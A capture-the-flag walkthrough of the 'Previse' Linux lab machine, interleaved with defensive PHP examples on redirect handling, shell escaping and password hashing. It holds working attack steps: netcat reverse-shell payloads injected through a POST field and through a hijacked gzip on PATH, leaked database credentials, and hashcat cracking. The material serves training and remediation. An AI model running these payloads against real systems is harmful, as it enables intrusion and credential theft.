PREVISE (Linux) Walkthrough


ENUMERATION

MACHINE IP

export IP=10.10.11.104

NMAP SCAN RESULTS

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Enumerating Web Contents

  • Using gobuster to find the directories
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u http://10.10.11.104/ -t 100 -x php,txt,js,html,jpg  -q
  • Directories Found
/download.php         (Status: 200) [Size: 2224]
/login.php            (Status: 200) [Size: 2224]
/index.php            (Status: 200) [Size: 2224]
/files.php            (Status: 200) [Size: 2224]
/nav.php              (Status: 200) [Size: 1248]
/header.php           (Status: 200) [Size: 980] 
/footer.php           (Status: 200) [Size: 217] 
/css                  (Status: 200) [Size: 939] 
/status.php           (Status: 200) [Size: 2224]
/js                   (Status: 200) [Size: 1155]
/logout.php           (Status: 200) [Size: 2224]
/accounts.php         (Status: 200) [Size: 2224]
/config.php           (Status: 200) [Size: 0]   
/logs.php             (Status: 200) [Size: 2224]

  • A little more analysis in Burp (or an active scan) reveals the contents of these pages: they redirect to /login.php, but the redirect response still carries the page content

  • Retrieve the contents of /accounts.php

  • You should be able to make a request to create an account

  • REQUEST TO CREATE ACCOUNT (can be figured out using Burp)
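The usual cause of a page that redirects to login.php yet still returns its content is a header('Location: ...') call that is not followed by exit. The following is an added example, not code from the Previse application; the session key 'user' and the page body are assumptions for illustration, and the form fields mirror the account-creation request above.

```php
<?php
// Added example (not Previse's own code). Demonstrates the redirect-without-exit
// bug and its fix. The session key 'user' is an assumed name.

session_start();

// VULNERABLE: the Location header is sent, but the script keeps running and the
// protected markup further down is still written into the redirect response.
// Burp, or curl without -L, shows that body; only a browser hides it by following
// the redirect.
function requireLoginVulnerable(): void
{
    if (empty($_SESSION['user'])) {
        header('Location: /login.php');
        // no exit here: execution falls through to the caller
    }
}

// FIXED: terminate the script right after the redirect so nothing else is sent.
// 303 See Other is the appropriate status for "go and log in first".
function requireLoginFixed(): void
{
    if (empty($_SESSION['user'])) {
        header('Location: /login.php', true, 303);
        exit;
    }
}

requireLoginFixed();
?>
<!-- everything below is reached only by an authenticated session -->
<form method="post" action="/accounts.php">
    <input name="username"><input name="password" type="password">
    <input name="confirm" type="password"><button name="submit">Create</button>
</form>
```

A quick regression check for this class of bug is to request each protected page unauthenticated with curl -s -i (no -L) and confirm that the 302/303 response has an empty body; a Content-Length matching the logged-in page, as gobuster's identical sizes hinted at here, means the exit is missing.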

POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=admin&password=testpass&confirm=testpass&submit=

  • Now we can log in to this account and further enumerate the web panel

  • We found a source code backup at

http://10.10.11.104/files.php
  • This source code backup was uploaded by the user newguy

  • Downloading and extracting it gives a lot of files to look through

  • Found some juicy content in config.php

<?php

function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}

?>


  • These may also be the user credentials

  • Let’s try SSH with the details below

  • DID NOT WORK


GETTING REVERSE SHELL

  • Let's read the source code files.

  • In /logs.php we can see a line that runs a Python script with user-supplied input interpolated directly into the shell command

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");

  • So we can use a payload like
delim=hello;nc -e /bin/sh 10.10.14.2 4444
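The root cause is that the POST field is pasted into a shell command line, so any shell metacharacter in it becomes part of the command. The following is an added example, not the application's own code: it contrasts the vulnerable string interpolation with an allowlist plus escapeshellarg. The script path and the delim field come from the walkthrough; the set of accepted delimiter names is an assumption.

```php
<?php
// Added example, not the code of the Previse application. LOG_SCRIPT and the
// "delim" field are from the walkthrough; ALLOWED_DELIMS is an assumed allowlist.

const LOG_SCRIPT = '/opt/scripts/log_process.py';
const ALLOWED_DELIMS = ['comma' => ',', 'space' => ' ', 'tab' => "\t"];

// VULNERABLE: the untrusted value is interpolated into a shell command line.
// Shell metacharacters (; & | $( ) and so on) let the caller run other commands.
function buildCommandVulnerable(string $delim): string
{
    return "/usr/bin/python " . LOG_SCRIPT . " {$delim}";
}

// SAFER: map the user's choice onto a fixed allowlist, refuse anything else,
// and still shell-escape the argument as defence in depth.
function buildCommandSafe(string $choice): ?string
{
    if (!array_key_exists($choice, ALLOWED_DELIMS)) {
        return null; // unknown delimiter: run nothing at all
    }
    $arg = escapeshellarg(ALLOWED_DELIMS[$choice]);
    return '/usr/bin/python ' . escapeshellarg(LOG_SCRIPT) . ' ' . $arg;
}

// Constructed inputs for demonstration: one legitimate choice, one with an
// injected command separator.
$inputs = ['comma', 'hello; id'];
foreach ($inputs as $in) {
    printf("input %-12s vulnerable: %s\n", var_export($in, true), buildCommandVulnerable($in));
    printf("%-18s safe:       %s\n", '', buildCommandSafe($in) ?? 'REJECTED');
}
```

On PHP 7.4 and later the shell can be avoided entirely by passing an argument array to proc_open (['/usr/bin/python', LOG_SCRIPT, $delim]), which hands the value to the script as a single argv element; the allowlist is still worth keeping so that the script only ever sees delimiters it expects.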

  • Original Request
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

delim=hello1111%26nc+-e+/bin/sh+10.10.14.2+4444

  • This should get us a reverse shell on a listener started beforehand
nc -lvp 4444

  • Stabilizing the netcat reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

PRESS CTRL + Z (to background the shell)

stty raw -echo

fg (to foreground the shell)


USER FLAG

  • We currently do not have access to the user m4lwhere files

  • We will have to find some way to read user.txt

  • Let’s find out what is inside the SQL DATABASE using above found credentials

    $user = 'root';
    $passwd = 'mySQL_p@ssw0rd!:)';
    $db = 'previse';

  • Use the commands below to see the data in the SQL database (the database name comes from config.php)
USE previse;

SHOW TABLES;

SELECT * FROM accounts;

  • The passwords we found are hashed, not stored in clear text (the $1$ prefix is MD5-crypt)
m4lwhere:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
admin:$1$🧂llol$FbsumqZUt.kJRCYaWurtw0

  • Cracking the passwords using hashcat (mode 500 is MD5-crypt; -a 0 is the straight wordlist attack, which is what rockyou.txt is used for here)
hashcat -a 0 -m 500 encrypted-creds.txt /usr/share/wordlists/rockyou.txt

  • Password Found
m4lwhere:ilovecody112235!
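The hashes fell to a wordlist attack because MD5-crypt is fast to compute, so a GPU can try a large part of rockyou per second. The following is an added example, not Previse's code, showing the legacy crypt() scheme next to password_hash(), plus a login path that verifies either format and upgrades legacy hashes on the next successful login. The sample password and salt are constructed values, not the real users' credentials.

```php
<?php
// Added example, not Previse's code. Contrasts the $1$ (MD5-crypt) format found in
// the accounts table with password_hash(), and upgrades old hashes at login time.

// Legacy scheme as found in the database: crypt() with an MD5-crypt salt.
function legacyHash(string $password, string $salt): string
{
    return crypt($password, '$1$' . $salt . '$');
}

// Modern scheme: password_hash() picks a random salt and a deliberately slow
// algorithm (bcrypt here; PASSWORD_ARGON2ID where the build supports it).
function modernHash(string $password): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
}

// Verifies against either format. On success with a legacy hash (or a bcrypt hash
// with an outdated cost), $newHash is set so the caller can store the upgrade.
function verifyAndUpgrade(string $password, string $stored, ?string &$newHash): bool
{
    $newHash = null;
    if (strncmp($stored, '$1$', 3) === 0) {
        // crypt() re-uses the stored value as the salt specification
        if (!hash_equals($stored, crypt($password, $stored))) {
            return false;
        }
        $newHash = modernHash($password);
        return true;
    }
    if (!password_verify($password, $stored)) {
        return false;
    }
    if (password_needs_rehash($stored, PASSWORD_BCRYPT, ['cost' => 12])) {
        $newHash = modernHash($password);
    }
    return true;
}

// Constructed demonstration values (not the real users' passwords or salt).
$legacy = legacyHash('correct horse', 'abcdefgh');
$ok = verifyAndUpgrade('correct horse', $legacy, $upgraded);
printf("legacy login ok: %s, upgraded hash prefix: %s\n",
    var_export($ok, true), substr($upgraded ?? '', 0, 7));
$bad = verifyAndUpgrade('wrong', $legacy, $unused);
printf("wrong password accepted: %s\n", var_export($bad, true));
```

Even with slow hashing, the walkthrough's next step (SSH with the same password) shows the other half of the problem: the cracked web password was reused for the system account, so password reuse should be treated as its own finding.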

  • SSH into the m4lwhere account
ssh m4lwhere@10.10.11.104

  • We can find the user flag at /home/m4lwhere/user.txt

PRIVILEGE ESCALATION

  • Let's find which commands we are allowed to run as root
sudo -l

  • We found that the script below is allowed to run as root
/opt/scripts/access_backup.sh

  • Contents of File

#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz


  • Here gzip is invoked without an absolute path, so the script resolves it through the PATH variable

  • We can prepend our own directory to PATH and create a gzip file there, which will be executed in place of the original gzip (LINUX PRIVILEGE ESCALATION USING THE PATH VARIABLE). This only works because sudo passes our PATH through to the script; a sudoers secure_path setting, or absolute paths like /bin/gzip in the script, would prevent it

export PATH=/tmp:$PATH
echo $PATH
cd /tmp
echo "nc -e /bin/bash 10.10.14.2 4444" > gzip
chmod 777 gzip
sudo /opt/scripts/access_backup.sh
  • Alongside, create a netcat listener to receive the reverse shell
nc -lnvp 4444

  • We should now have a root shell.

  • Check /root/root.txt for the root flag.


PREVISE HAS BEEN PWNED